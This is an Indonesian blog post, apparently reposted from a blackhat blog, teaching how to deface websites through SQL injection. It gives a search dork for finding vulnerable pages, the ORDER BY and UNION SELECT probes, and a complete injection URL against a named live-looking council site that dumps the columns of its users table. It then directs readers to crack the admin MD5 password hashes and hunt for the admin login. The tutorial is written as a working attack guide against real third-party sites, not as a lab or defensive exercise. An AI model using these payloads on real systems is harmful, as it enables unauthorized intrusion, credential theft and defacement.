sumber lebih di pentinkan: screamo-blackhat.blogspot.com
di postingan ku yang ke 7 ini saya akan membagikan cara deface dengan SQL injection
tehnik ini bisa di lakukan dengan ponsel atau pc/laptop
yang penting bisa internetan...
ini dia caranya:
buka browser anda masing masing siapkan kopi atau kuwaci (bagi yang lemot)
langsung dorknya :inurl:readnews.php?id=
berarti situs itu vuln... jika tidak ada berarti situs itu sudah di path.. lanjut >>
sekarang kita hapus tanda ' ganti dengan +order+by+1-- . jika tidak error kita ganti dengan +order+by+2-- dan seterusnya ... sampai ada tulisan error lagi
tips:agar lebih cepat langsung sajah coba +order+by+10-- jika tidak error coba +order+by+20-- jika error terus ubah menjadi hitungan mundur hingga halaman kembali normal
back to topic ternyata errornya di 6 lalu kita tambahakan +union+select+1,2,3,4,5-- dan di antara = dengan no (36) tambahakn (-) kenapa sampai angka 5 karena ya harus segitu ... intinya angka nya tidak boleh melebihi/sama dengan angka errornya
lanjut...>> nanti akan keluar angka togel (lol) itu bukan angka togrl tapi angka apa yah ??? kasih tau gk yah.. daya juga gk tau hehehehe... back to topic
yang ke luar angka pertamanya adalah 2 lalu kita ganti di +union+select+1,2,3,4,5-- dengan version() lalu enter or go dan mucul angka lagi .. dan yang kali ini muncul angka 5.0.96
dan muncul lah banyak category
Selanjutnya kita cari column dari ntable yg ada hubungannya dengan user+password admin,
jadi kita ambil table "users" tapi sebelumnya kata "users" tersebut kita convert dulu
ke HEXA agar dapat dibaca oleh SQL di sini :http://snarkles.net/scripts/sneak/sneak.php
ketik : users pilih ASCII to Hex hasilnya : 7573657273 (hapus jika berspasi)
Perintah selanjutnya adalah ubah [group_concat(column_ name)] pada(table_name) dan[+from+information_schema.columns+where+table_name=0xHEXA--] di akhir URL.
Ganti HEXA dengan hasil convert tadi yaitu : 7573657273 tambahkan 0x didepanHEXA agar server dapat mengetahui bahwa itu telah diconvert ke HEXA
Seperti ini : http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=0x7573657273--
kita berhasil menemukan kolom : id,username,password,name,email,lastlogin,ip
Pilih kolom username dan password aja ya gan hehe :D
tinggal kita crack password md5nya langsung menuju situs ini
sudah deh tinggal nyari tempat login admin.. dan bagian itu lah yang susah.. kita butuh bantuan software
cara nyari tempat login admin akan saya bahas lain kali :)
thx to blog : http://screamo-blackhat.blogspot.com/2013/08/tutorial-sql-injection-versi-opera-mini.html
seperti biasa minta komentar buat blog ini :)